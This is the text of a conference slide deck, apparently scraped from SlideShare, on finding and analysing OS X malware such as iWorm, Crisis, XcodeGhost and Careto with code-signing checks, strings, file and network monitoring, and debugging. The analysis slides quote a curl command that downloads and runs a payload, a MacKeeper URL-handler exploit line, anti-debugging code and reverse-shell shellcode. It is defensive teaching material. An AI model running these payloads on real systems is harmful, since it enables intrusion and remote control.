SlideShare ist ein Scribd-Unternehmen logo

Session ID: Let’s Play Doctor

Synack
Synack

‣ This document provides an overview of OS X malware diagnosis and analysis techniques. ‣ It discusses common infection vectors for OS X malware, such as fake installers and infected torrents. ‣ A variety of analysis techniques are presented, including checking for known malware signatures, analyzing file attributes, strings, dynamic file I/O, and network activity to help determine if a binary is malicious.

Technologie
1 von 51
Downloaden Sie, um offline zu lesen
SESSION ID: Let’s Play Doctor
 Prac/cal OS X Malware Detec/on & Analysis HTA-W03F Patrick Wardle Director of Research at Synack
 @patrickwardle
WHOIS “leverages the best combina1on of humans and technology to discover security vulnerabili1es in our customers’ web apps, mobile apps, IoT devices and infrastructure endpoints” @patrickwardle security for the 21st century career hobby
OUTLINE steps to a happier, healthier 2016 outbreaks diagnos:cs analysis health & happiness virology } @thomasareed @claud_xiao @osxreverser thanks & credit
PART 0X1: OUTBREAKS overview of recent OS X malware specimens
MALWARE ON OS X yes; it exists and is geSng more prevalent “It doesn’t get PC viruses. A Mac isn’t suscep1ble to the thousands of viruses plaguing Windows-based computers.” -apple.com (2012) 2014: "nearly 1000 unique aMacks on Macs; 25 major families" -kasperksy 2015: "The most prolific year in history for OS X malware...5x more OS X malware appeared in 2015 than during the previous five years combined" 
 -bit9 2015: OS X most vulnerable soEware by CVE count -cve details
OS X/IWORM ‘standard’ backdoor, providing survey, download/execute, etc. # fs_usage -w -f filesys 20:28:28.727871 open /Library/LaunchDaemons/com.JavaW.plist 20:28:28.727890 write B=0x16b launch daemon survey download execute persis:ng infected torrents launch daemon plist
OS X/CRISIS (RCSMAC) hackingteam's implant; collect all things! launch agent rootkit component persistence (leaked source code) intelligence collec:on “HackingTeam Reborn; 
 Analysis of an RCS Implant Installer"
OS X/XCODEGHOST applica/on infector $ less Xcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/ Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec
 ... Name = ALL_OTHER_LDFLAGS; DefaultValue = "$(LD_FLAGS) $(SECTORDER_FLAGS) $(OTHER_LDFLAGS) $(OTHER_LDFLAGS_$(variant)) $ (OTHER_LDFLAGS_$(arch)) $(OTHER_LDFLAGS_$(variant)_$(arch)) $(PRODUCT_SPECIFIC_LDFLAGS) 
 -force_load $(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices"; modified LD.xcspec file source compile app store infected :( infected app app installed
} OS X/GENIEO (INKEEPR) most prolific os x adware browser extension(s) fake installers bundled with apps ADs
OS X/BACKDOOR(?) bot/backdoor that exploits MacKeeper <script> window.location.href = 'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/<BASE_64_ENCODED_STUB>'; ... "[a] flaw in MacKeeper's URL handler implementa1on allows arbitrary remote code execu1on when a user visits a specially cra]ed webpage" -bae systems exploit & payload launch agent curl -A 'Safari' -o /Users/Shared/dufh http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh shell download executesurvey
OS X/CARETO ('MASK') ‘cyber-espionage backdoor' launch agent [~/Library/LaunchAgents/ com.apple.launchport.plist] lea rdi, encodedServer ; "x16dn~x1AcM!"... mov rsi, decodedServer call __Dcd ... mov rdi, decodedServer mov esi, cs:_port call _sbd_connect $ lldb OSX_Careto (lldb) target create "OSX_Careto" Current executable set to 'OSX_Careto' (x86_64).'' 
 (lldb) b _Dcd Breakpoint 1: where = OSX_Careto`_Dcd,
 ... $ (lldb) x/s decodedServer 0x100102b40: "itunes212.appleupdt.com" disassembly debugging (decoding C&C) encoded strings phishing/exploits
PART 0X2: VIROLOGY study of os x malware characteris/cs & commonali/es
INFECTION VECTORS method 0x1: via user-interac/on fake codecs fake installers/updates infected torrents rogue "AV" products ??? poor naive users
INFECTION VECTORS method 0x2: exploits "interested in buying zero-day vulnerabili1es with RCE exploits for the latest versions of ...Safari? ...exploits allow to embed and remote execute custom payloads and demonstrate modern [exploita1on] techniques on OS X" 
 -V. Toropov (email to hackingteam) how the real hackers do it } ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"x41xB0x02x49xC1xE0x18x49x83xC8x61x4Cx89xC0x48" + ;"x31xD2x48x89xD6x48xFFxC6x48x89xF7x48xFFxC7x0F" + ;"x05x49x89xC4x49xBDx01x01x11x5CxFFxFFxFFxFFx41" + ;"xB1xFFx4Dx29xCDx41x55x49x89xE5x49xFFxC0x4Cx89" + ;"xC0x4Cx89xE7x4Cx89xEEx48x83xC2x10x0Fx05x49x83" + ;"xE8x08x48x31xF6x4Cx89xC0x4Cx89xE7x0Fx05x48x83" + ;"xFEx02x48xFFxC6x76xEFx49x83xE8x1Fx4Cx89xC0x48" + ;"x31xD2x49xBDxFFx2Fx62x69x6Ex2Fx73x68x49xC1xED" + ;"x08x41x55x48x89xE7x48x31xF6x0Fx05"
PERSISTENCE many op/ons, few used launchdaemons&agents userloginitems browserextensions&plugins [RSA2015]
 "Malware Persistence on OS X" ~20 techniques
FEATURES dependent on the goals of the malware [ criminal ] [ espionage ] shell video audio ads clicks money keylogs surveys downloads exec's
SUMMARY the current state of OS X malware crime espionage persistence psp bypassself-defense features ‣ well known methods ‣ majority: launch items ‣ minimal obfusca:on ‣ trivial to detect/remove ‣ poorly implemented ‣ suffice for the job ‣ occasional an:-AV ‣ no psp detec:on stealth ‣ 'hide' in plain site ‣ rootkits? not common infec:on ‣ trojans/phishing ‣ some exploits
PART 0X3: DIAGNOSTICS are you possibly infected?
VISUALLY OBSERVABLE INDICATORS more ohen than not, you're not infected... unlikelymalware possiblymalware "mycomputeris soslow" "itkeepscrashing" ADs "somanyprocesses" "therearetonsofpopups" "mycomputersaysitsinfected "myhomepageandsearch engineareweird" most not trivially observable!
VISUALLY OBSERVABLE INDICATORS generic alerts may indicate the presence of malware persistence(BlockBlock) networkaccess(LittleSnitch) note:suchtoolsdonotattempttodirectlydetectmalwareper-se…
STEP 0X1: KNOWN MALWARE any known malware running on your system? TaskExplorer(+virustotalintegration) VT ratios
STEP 0X2: SUSPICIOUS PROCESSES any unrecognized binaries running on your system? unsignedtasks “globalsearch”for: 3rd-partytasks unsigned "apple" unrecognized(byVT) suspicious! + +
STEP 0X3: SUSPICIOUS PERSISTENCE any unrecognized binaries persis/ng on your system? KnockKnock;enum.persistence unsigned "apple" suspicious! asuspiciouslaunchitem unrecognized(byVT) + +
STEP 0X4: NETWORK I/O odd ports or unrecognized connec/ons? # sudo lsof -i | grep ESTABLISHED apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) com.apple 1168 user TCP 172.16.44.128:49511->bd044252.virtua.com.br:https (ESTABLISHED) JavaW 1184 root TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED) iWorm('JavaW')listeningforattackerconnection or 'established' for connected sessions iWormconnectedtoc&cserver
STEP 0X5: SUSPICIOUS KEXTS, HIJACKED DYLIBS, ETC. countless other things to look for.... uncheck ‘'Show OS Kexts' anysuspiciouskernelextensions? hijackeddylibs? [DefCon 2015] "DLL Hijacking on OS X? #@%& Yeah!"
PART 0X4: ANALYSIS determine if something is malicious....or not!?
CODE-SIGNING examine the binary’s code signature $ codesign -dvv /usr/lib/libtidy.A.dylib 
 Format=Mach-O universal (i386 x86_64)
 Authority=Software Signing Authority=Apple Code Signing Certification Authority Authority=Apple Root CA libtidy is signed by apple proper codesign -dvv OSX_Careto 
 OSX_Careto: code object is not signed at all most malware; unsigned signed by apple: not malware! libtidy dylib flagged by VT usecodesigntodisplaya binary’ssigninginfo ex:$ codesign -dvv <file>
GOOGLE THE HASH may (quickly) tell you; known good || known bad $ md5 appleUpdater MD5 (appleUpdater) = 2b30e1f13a648cc40c1abb1148cf5088 unknown hash ….might be odd ‣ 3rd-partybinaries,mayproduce zerohitsongoogle ‣ 0%detectiononvirustotaldoesn’t mean100%notmalware known hash (OSX/Careto)
STRINGS quickly triage a binary’s func/onality $ strings -a OSX_Careto
 reverse lookup of %s failed: %s bind(): %s connecting to %s (%s) [%s] on port %u executing: %s
 cM!M> `W9_c [0;32m strings;osx/careto networking& execlogic encodedstrings $ strings -a JavaW 
 $Info: This file is packed with the UPX executable packer $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. strings; iWorm usewiththe-aflag packed(UPX) googleinterestingstrings
FILE ATTRIBUTES OS X na/vely support encrypted binaries ourhardworkbythese wordsguardedplease dontsteal(c)AppleC encrypted with Blowfish disassembling Finder.app encryp:ng the malware $ strings -a myMalware infectUser: ALOHA RSA! $ ./protect myMalware encrypted 'myMalware' $ strings -a myMalware 
 n^jd[P5{Q r_`EYFaJq07 known malware: ~50% drop VT detection
FILE ATTRIBUTES detec/ng encrypted binaries //check all load commands for(int i = 0; i<[machoHeader[LOAD_CMDS] count]; i++) { //grab load command loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i];
 //check text segment if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)) { //check if segment is protected if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1)) { //FILE IS ENCRYPTED detec:ng encryp:on TaskExplorer }unsigned encrypted +
FILE ATTRIBUTES malware is ohen packed to 'hinder' detec/on/analysis $ strings -a JavaW
 
 Info: This file is packed with the UPX executable packer http://upx.sf.net Id: UPX 3.09 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. iWorm(JavaW);packed //count all occurrences for(NSUInteger i = 0; i < length; i++) occurrences[0xFF & (int)data[i]]++; //calc entropy for(NSUInteger i = 0; 
 i < sizeof(occurrences)/sizeof(occurrences[0]); i++) { //add occurrences to entropy if(0 != occurrences[i]) { //calc ratio pX = occurrences[i]/(float)length; //cumulative entropy entropy -= pX*log2(pX); } TaskExplorer genericpackerdetectionalgorithm viewallpackedtasks/dylibs
CLASSDUMP extract class names, methods, & more... $ class-dump RCSMac.app
 
 @interface __m_MCore : NSObject { NSString *mBinaryName; NSString *mSpoofedName; } - (BOOL)getRootThroughSLI;
 - (BOOL)isCrisisHookApp:(id)arg1;
 - (BOOL)makeBackdoorResident; - (void)renameBackdoorAndRelaunch;
 @end rcsmac(osx/crisis) $ class-dump Installer.app
 
 @interface ICDownloader : 
 NSObject <NSURLConnectionDelegate> { NSURL *_URL; NSString *_destPath; long long _httpStatusCode; NSString *_suggestedName; } - (void)startDownloading; @interface NSURL (ICEncryptedFileURLProtocol) + (id)fileURLWithURL:(id)arg1; + (id)encryptedFileURLWithURL:(id)arg1; @end adwareinstaller(InstallCore) http://stevenygard.com/projects/class-dump/
DYNAMIC FILE I/O quickly determine binaries file-related ac/ons # fs_usage -w -f filesystem
 open /Users/user/Library/LaunchAgents/com.apple.updater.plist write F=2 B=0x4a 
 
 
 open F=5 /Users/Shared/dufh …
 chmod <rwxr-xr-x> /Users/Shared/dufh 
 unlink ./mackeeperExploiter filei/o(mackeeperexploiter) $ man fs_usage FS_USAGE(1) BSD General Commands Manual fs_usage -- report system calls and page faults related to filesystem activity in real-time fs_usagemanpage persistenceaslaunchagent (com.apple.updater.plist) installation(/Users/ Shared/dufh) selfdeletion,cleanup
NETWORK I/O gain insight into the binary's network communica/ons osx/caretoinwireshark note: C&C is (now) offline odddnsqueries periodicbeacons (custom)encryptedtraffic "itunes212.appleupdt.com"
VIRUSTOTAL SANDBOX file i/o + network i/o, and more! virustotalportal filei/o(iWorm) networki/o(iWorm) "VirusTotal+=MacOSXexecution"
 
 blog.virustotal.com/2015/11/ virustotal-mac-os-x-execution.html
REVERSING OBJECTIVE-C understand connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString ; "URLWithString:" lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ; objc_msgSend ... internetcheck(mackeeperexploiter) arg name (for) objc_msgSend 0 RDI class 1 RSI method name 2 RDX 1st argument 3 RCX 2nd argument 4 R8 3rd argument 5 R9 4th argument objc_msgSendfunction callingconvention(systemvamd64abi)
DECOMPILATION there’s an app for that! int connectedToInternet() { rax = [NSURL URLWithString:@"http://www.google.com"]; rdx = rax; var_38 = [NSData dataWithContentsOfURL:rdx]; if(var_38 != 0x0) { var_1 = 0x1; } else { var_1 = 0x0; } rax = var_1 & 0x1 & 0xff; return rax; } decompilation;internetcheck(mackeeperexploiter) connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString_ lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ... hopper.app
 http://www.hopperapp.com
DEBUGGING using lldb; os x’s debugger command description example r launch (run) the process b breakpoint on function b system br s -a <addr> breakpoint on a memory add br s -a 0x10001337 si/ni step into/step over po print objective-C object po $rax reg read print all registers $ lldb newMalware (lldb) target create "/Users/patrick/malware/newMalware" Current executable set to '/Users/patrick/malware/newMalware' (x86_64). beginningadebuggingsession see:"Gdb to LLDB Command Map" commonlldbcommands
DEBUGGING DETECTION os x an/-debugging techniques call _getpid mov [rbp+var_34], eax mov [rbp+var_2D0], 288h lea rdi, [rbp+var_40] lea rdx, [rbp+var_2C8] lea rcx, [rbp+var_2D0] mov esi, 4 xor r8d, r8d xor r9d, r9d call _sysctl mov eax, [rbp+var_2A8] test ah, 8 jz short notDebugged mov rdi, [rbx] call _remove //debugger flag #define P_TRACED 0x00000800 //management info base (‘mib’) mib[0] = CTL_KERN; mib[1] = KERN_PROC; mib[2] = KERN_PROC_PID; mib[3] = getpid(); //get process info sysctl(mib, sizeof(mib)/sizeof(*mib), &info, &size, NULL, 0); //check flags to determine if debugged if(P_TRACED == (info.kp_proc.p_flag & P_TRACED)) { //process is debugged!
 //self delete remove(path2Self); } anti-debug(mackeeperexploiter) processflags(debugged) anti-debugpseudo-code “Analyzing the Anti-Analysis Logic, of an Adware Installer"
ENABLING KERNEL DEBUGGING for analyzing kernel extensions and rootkit components # nvram boot-args="debug=0x141 pmuflags=1 -v" enabledebugging disableSIP(inrecoverymode;⌘+r) installappropriate‘kerneldebugkit’ # lldb (lldb) target create /Library/Developer/KDKs/ KDK_10.11.1_15B42_.kdk/System/Library/Kernels/kernel startdebugger(lldb) (lldb) kdp-remote <VM IP addr> Version: Darwin Kernel Version 15.0.0: Wed Aug 26 16:57:32 PDT 2015; root:xnu-3247.1.106~1/ RELEASE_X86_64; 
 
 (lldb) image list [ 0] 37BC582F-8BF4-3F65-AFBB-ECF792060C68 0xffffff8007000000 /Library/Developer/KDKs/ KDK_10.11_15A284.kdk/System/Library/Kernels/kernel connectanddebug “Kernel Debugging a Virtualized 
 OS X Image"
PART 0X5: HEALTH & HAPPINESS how do i protect my personal macs?
APPLE'S OS X SECURITY MITIGATIONS? gatekeeper, xprotect, SIP, code-signing, et al... "Security & privacy are fundamental to the design of all our hardware, so]ware, and services" -:m cook ‣ "Gatekeeper Exposed"
 (Shmoocon) ‣ "OS X El Capitan-Sinking the S/hIP" ‣ "Memory Corruption is for Wussies!" (SysScan) ‣ "Writing Bad@ss OS X Malware" 
 (Blackhat) ‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)
only 4 launch items no 'java' processes fully patched OS X gatekeeper enabled DEMO(GATEKEEPER BYPASS)
OS X LOCKDOWN hardens OS X & reduces its anack surface # ./osxlockdown [PASSED] Enable Auto Update [PASSED] Disable Bluetooth [PASSED] Disable infrared receiver [PASSED] Disable AirDrop ...
 
 osxlockdown 0.9 Final Score 86%; Pass rate: 26/30
 osxlockdown
 S.Piper(@0xdabbad00) github.com/SummitRoute/osxlockdown “builttoaudit&remediate,security configurationsettingsonOSX10.11" -S.Piper
OS X SECURITY TOOL LinleSnitch Firewall “if[LittleSnitch]isfound,themalware[OSX/DevilRobber.A]willskip installationandproceedtoexecutethecleansoftware”-fSecure.com trivialtobypass securityvulnerabilities? yes, stay tuned! 'snitching
MY PERSONAL SECURITY TOOLS Objec/ve-See, because "sharing is caring" :) "No one is going to provide you a quality service for nothing. 
 If you’re not paying, you’re the product." -fSecure ...as they try to sell things! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
SECURITY TOOLS Objec/ve-See KnockKnock BlockBlock TaskExplorer Ostiarius Hijack Scanner KextViewr Lockdown specimenstoplaywith!
CONCLUSIONS wrapping this all up…
CONCLUSIONS & APPLICATION osxmalware (iWorm,Crisis,Genieo,etc.) learned about: scan & protect! littlesnitch/firewall patrick@synack.com @patrickwardle genericdetection&analysis 'focusonsession'
 today@2:10PM,westroom2016
credits - iconmonstr.com - http://wirdou.com/2012/02/04/is-that-bad-doctor/
 
 
 - thesafemac.com - "Mac OS X & iOS Internals", Jonathan Levin - http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware- and-affected-ios-apps/ - http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html - http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
 images resources

Empfohlen

OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper ExposedSynack
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningMikhail Sosonkin
 
Synack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 

Empfohlen

OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
Black Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XBlack Hat '15: Writing Bad @$$ Malware for OS X
Black Hat '15: Writing Bad @$$ Malware for OS XSynack
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper ExposedSynack
 
ZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningZeroNights: Automating iOS blackbox security scanning
ZeroNights: Automating iOS blackbox security scanningMikhail Sosonkin
 
Synack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS XSynack
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!Synack
 
Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
 
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...Jakub "Kuba" Sendor
 
The Mouse is mightier than the sword
The Mouse is mightier than the swordThe Mouse is mightier than the sword
The Mouse is mightier than the swordPriyanka Aash
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsPriyanka Aash
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...Felipe Prado
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector Rishi Bhargava
 
Csw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physicalCsw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physicalCanSecWest
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5Jayesh Patel
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
BSidesSF 2016 - A year in the wild: fighting malware at the corporate level
BSidesSF 2016 - A year in the wild: fighting malware at the corporate levelBSidesSF 2016 - A year in the wild: fighting malware at the corporate level
BSidesSF 2016 - A year in the wild: fighting malware at the corporate levelJakub "Kuba" Sendor
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...Felipe Prado
 
Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningSynack
 

Weitere ähnliche Inhalte

Was ist angesagt?

iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS XSynack
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!Synack
 
Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
 
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...Jakub "Kuba" Sendor
 
The Mouse is mightier than the sword
The Mouse is mightier than the swordThe Mouse is mightier than the sword
The Mouse is mightier than the swordPriyanka Aash
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsPriyanka Aash
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...Felipe Prado
 
Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Codetainer: a Docker-based browser code 'sandbox'
Codetainer: a Docker-based browser code 'sandbox'Jen Andre
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector sf bay area dfir meetup (2016-04-30) - OsxCollector
sf bay area dfir meetup (2016-04-30) - OsxCollector Rishi Bhargava
 
Csw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physicalCsw2016 economou nissim-getting_physical
Csw2016 economou nissim-getting_physicalCanSecWest
 
Hack any website
Hack any websiteHack any website
Hack any websitesunil kumar
 
BSidesSF 2016 - A year in the wild: fighting malware at the corporate level
BSidesSF 2016 - A year in the wild: fighting malware at the corporate levelBSidesSF 2016 - A year in the wild: fighting malware at the corporate level
BSidesSF 2016 - A year in the wild: fighting malware at the corporate levelJakub "Kuba" Sendor
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...Felipe Prado
 

Was ist angesagt? (20)

iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation Primitives
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation Vulnerabilities
 
DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS X
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
 
Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015
 
DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 Devices
 
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
OSXCollector: Automated forensic evidence collection & analysis for OS X (Bru...
 
The Mouse is mightier than the sword
The Mouse is mightier than the swordThe Mouse is mightier than the sword
The Mouse is mightier than the sword
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
Fire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS FirewallsFire & Ice: Making and Breaking macOS Firewalls
Fire & Ice: Making and Breaking macOS Firewalls
 
